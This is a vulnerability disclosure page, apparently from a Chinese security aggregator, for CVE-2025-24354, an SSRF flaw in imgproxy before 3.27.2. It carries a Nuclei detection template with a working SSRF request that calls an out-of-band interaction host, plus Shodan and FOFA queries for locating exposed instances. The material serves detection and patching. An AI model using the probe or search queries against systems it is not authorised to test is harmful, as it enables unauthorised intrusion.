漏洞描述
imgproxy contains an issue caused by not blocking the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, letting local services be exposed, exploit requires network access.
CVE-2025-24354: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)
PoC代码[已公开]
id: CVE-2025-24354
info:
name: Imgproxy < 3.27.2 - Server-Side Request Forgery (SSRF)
author: oksuzkayra
severity: medium
description: |
imgproxy contains an issue caused by not blocking the 0.0.0.0 address even when IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES is set to false, letting local services be exposed, exploit requires network access.
impact: |
Local services may be exposed to unauthorized access, risking information disclosure or local system compromise.
remediation: |
The vulnerability has been fixed in imgproxy version 3.27.2. The fix involves updating the source address verification to also check for unspecified IP addresses (0.0.0.0) using the ip.IsUnspecified() function in addition to the existing ip.IsLoopback() check.
reference:
- https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081
- https://github.com/imgproxy/imgproxy/security/advisories/GHSA-j2hp-6m75-v4j4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-24354
cwe-id: CWE-918
epss-score: 0.10553
epss-percentile: 0.92517
metadata:
verified: true
max-request: 1
product: imgproxy
shodan-query: http.html:"imgproxy"
fofa-query: body="imgproxy"
tags: cve,cve2025,imgproxy,ssrf,oast,oob
http:
- method: GET
path:
- "{{BaseURL}}/unsafe/plain/http://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
- "status_code == 422"
- "contains(body, 'Invalid source image')"
condition: and
# digest: 4a0a00473045022100ab76800c48e7b89a1707475e4bbf2a9a069212357d1f2b22765b704b57973dad022065cd22cdebd6e7533f5cc9cbaf02733c892f5e61fc92f35c24c761e5115997e5:922c64590222798bb761d5b6d8e72950